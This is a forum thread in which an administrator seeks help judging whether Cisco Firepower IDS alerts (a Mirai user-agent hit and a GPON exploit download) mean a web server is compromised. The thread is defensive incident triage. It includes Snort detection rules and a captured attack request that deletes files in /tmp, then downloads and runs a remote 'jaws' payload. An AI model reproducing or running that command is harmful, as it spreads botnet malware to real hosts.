Solved: IPS Event - how to know if it's just a drive by or a compromise

sanchezeldorado · ‎04-21-2022

Hello. I just setup IDS for the first time in Cisco firepower. I'm not ready to implement IPS in my environment. I have a couple of high priority events so far. I want to look at a specific one and get some input on whether or not I actually have a trojan inside my network, or if it's more of just a drive by attempt to access the network. I have a web server accessible with port 80 and 443. Here's the event info without my specific info:

Event MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Timestamp 2022-04-21 14:08:10
Classification A Network Trojan was Detected
Priority high
Ingress Security Zone Outside
Egress Security Zone DMZ-BUS
Device <Firewall name>
Ingress Interface Lumen
Egress Interface DMZ-BUS
Source IP 156.218.101.54
Source Port / ICMP Type 44371 / tcp
Source Country EgyptEGY
Destination IP <Internal device IP>
Destination Port / ICMP Code 80 (http) / tcp
Intrusion Policy <intrusion policy name>
Access Control Policy <access control policy name>
Access Control Rule WebTraffic-In-APPS
Rule alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC User-Agent known malicious user-agent string - Mirai"; flow:to_server,established; content:"User-Agent|3A| Hello, world"; fast_pattern:only; http_header; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; reference:url,www.virustotal.com/en/file/3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d/analysis/; classtype:trojan-activity; sid:58992; rev:1; gid:1; )

Packet Text
...w.m.d@G.B..E... .@.6.T...e6?....S.P
^..Og..P..X....GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive

sanchezeldorado · ‎04-23-2022

I'll consider this closed. A lot more digging and many other results suggest it is compromised.

View solution in original post

Francesco Molino · ‎04-21-2022

Hi

Is your IPS configured with drop inline checkbox enabled? what ips level you have configured?

If so, this traffic is normally dropped.

if IPS isn’t dope then I’ll investigate more on this server to make sure it’s not compromised.

thanks

Thanks
Francesco
PS: Please don't forget to rate and select as validated answer if this answered your question

sanchezeldorado · ‎04-21-2022

Hello. At the time, i didn't have approval to drop traffic, but I have now checked the drop inline checkbox. I haven't gotten any more intrusion events blocked or otherwise since, but I think it likely that they just switched to HTTPS, and I don't have SSL decryption enabled. I know HOW to block these threats. With both security intelligence and with ssl decryption, but my client is very hesitant to add these to their 24/7 network. They've had bad experiences in the past. My main concern is whether or not a host inside the network is already compromised. Since my initial post, I did get another event that makes me pretty sure I'm compromised because it was initiated from inside the network at the exact same time as a CnC event with the same IP.

Event MALWARE-OTHER GPON exploit download attempt (1:46840:1)
Timestamp 2022-04-21 19:01:01
Classification A Network Trojan was Detected
Priority high
Ingress Security Zone DMZ-BUS
Egress Security Zone Outside
Device <FW name>
Ingress Interface DMZ-BUS
Egress Interface Lumen
Source IP <Web server IP>
Source Port / ICMP Type 80 (http) / tcp
Destination IP 116.75.242.18
Destination Port / ICMP Code 60930 / tcp
Destination Country India IND
Intrusion Policy <Intrusion policy>
Access Control Policy <ACP>
Access Control Rule WebTraffic-In-APPS
Rule alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:"MALWARE-OTHER GPON exploit download attempt"; flow:to_client,established; file_data; content:"/GponForm/diag_Form?images/"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service ftp-data, service http, service imap, service pop3; reference:cve,2018-10561; reference:url,vpnmentor.com/blog/critical-vulnerability-gpon-router/; classtype:trojan-activity; sid:46840; rev:1; gid:1;

sanchezeldorado · ‎04-23-2022

I'll consider this closed. A lot more digging and many other results suggest it is compromised.